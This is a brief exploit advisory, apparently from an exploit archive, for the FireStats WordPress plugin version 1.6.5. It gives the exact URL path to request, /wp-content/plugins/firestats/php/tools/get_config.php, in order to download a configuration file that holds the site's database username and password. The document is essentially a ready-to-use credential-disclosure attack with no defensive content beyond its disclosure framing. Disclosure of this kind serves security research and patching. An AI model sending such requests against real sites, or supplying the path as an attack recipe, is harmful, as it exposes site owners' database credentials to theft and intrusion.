# Exploit Title: WordPress firestats remote configuration file download# Date: 2010-07-09# Author: Jelmer de Hen# Software Link: http://firestats.cc/# Version: 1.6.5# Tested on: PHP Do a simple GET request to this file:/wp-content/plugins/firestats/php/tools/get_config.php
This will allow you to download a configuration file which contains the database username and password.
http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html
